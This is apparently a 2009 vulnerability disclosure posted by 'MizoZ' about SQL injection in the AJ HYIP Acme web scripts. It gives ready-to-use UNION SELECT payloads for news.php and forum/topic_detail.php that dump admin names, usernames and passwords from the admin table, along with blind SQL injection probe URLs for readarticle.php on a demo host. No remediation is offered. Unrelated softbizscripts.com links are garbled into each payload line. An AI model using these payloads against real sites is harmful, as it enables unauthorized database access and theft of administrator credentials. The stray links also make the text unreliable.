/*

AJ HYPE ACME (bSQLi/SQLi) Multiple Remote Vulnerabilities

Discovered by : MizoZ
Contact : mizozx@gmail.com

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

SQL Injection news.php (GET : id) :
[HOST]/[PATH]/news.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>

SQL CODE :
null+union+select+1,2,concat(admin_name,0x3a,username,0x3a,admin_password),4,5+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>

-----------------------------

SQL Injection topic_detail.php (GET : id) :
[HOST]/[PATH]/forum/topic_detail.php?id=[SQL
CODE]<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>

SQL CODE :
null+union+select+1,2,3,concat(admin_name,0x3a,username,0x3a,admin_password),5,6,7,8+from+admin--<http://www.softbizscripts.com/scripts/shoppingcart/browsecats.php?cid=%5BSQL>

ONLY IN ACME EXTENSION

-----------------------------

Blind SQL Injection readarticle.php (GET : artid)

http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=1--==>>
TRUE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+1=0--==>>
FALSE
http://www.ajhyip.com/demo/acme/article/readarticle.php?artid=3+and+%28select%20@@version%29=5--==>>
TRUE